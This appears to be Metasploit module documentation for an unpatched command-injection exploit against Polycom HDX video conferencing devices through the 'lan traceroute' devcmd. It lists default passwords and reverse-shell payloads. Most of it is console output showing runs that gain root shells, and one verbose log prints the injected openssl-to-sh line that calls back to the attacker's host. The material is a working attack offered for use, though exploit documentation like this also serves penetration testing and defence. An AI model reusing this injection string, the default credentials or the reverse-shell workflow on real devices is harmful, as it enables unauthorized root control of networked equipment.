Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` ## Vulnerable Application Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup) ## Options ### PASSWORD Although a majority of devices come without a password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or the devices. ## Payloads Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic` ``` Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) ``` ## Verification Steps A successful check of the exploit will look like this: ``` msf exploit(polycom) > set RHOST 192.168.0.17 RHOST => 192.168.0.17 msf exploit(polycom) > set LHOSt ens3 LHOSt => ens3 msf exploit(polycom) > set LPORT 3511 LPORT => 3511 msf exploit(polycom) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) msf exploit(polycom) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse msf exploit(polycom) > set VERBOSE false VERBOSE => false msf exploit(polycom) > run [*] Started reverse TCP double handler on 192.168.0.11:3511 [+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! [+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo vGopPRp0jBxt4J2D; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "vGopPRp0jBxt4J2D\n" [*] Matching... [*] A is input... [*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500 [*] 192.168.0.17:23 - Shutting down payload stager listener... id uid=0(root) gid=0(root) whoami root ``` ## Debugging Setting `VERBOSE` to true should yield an output of. ``` msf exploit(polycom) > set VERBOSE true VERBOSE => true rmsf exploit(polycom) > run [*] Started reverse TCP double handler on 192.168.0.11:3511 [*] 192.168.0.17:23 - Received : ! Polycom Command Shell XCOM host: localhost port: 4121 TTY name: /dev/pts/6 Session type: telnet 2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68] 2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340 2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340) 2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9 2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104] 2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380] 2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6] 2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342) 2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10 2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918 2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx 2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered [+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! [+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo WD3QloY3fys6n7dK; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] 192.168.0.17:23 - devcmds Entering sticky internal commands *ONLY* mode... lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` 2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`] 2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68 2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0 [*] Reading from socket B [*] B: "WD3QloY3fys6n7dK\n" [*] Matching... [*] A is input... [*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500 [*] 192.168.0.17:23 - Shutting down payload stager listener... id uid=0(root) gid=0(root) whoami root ```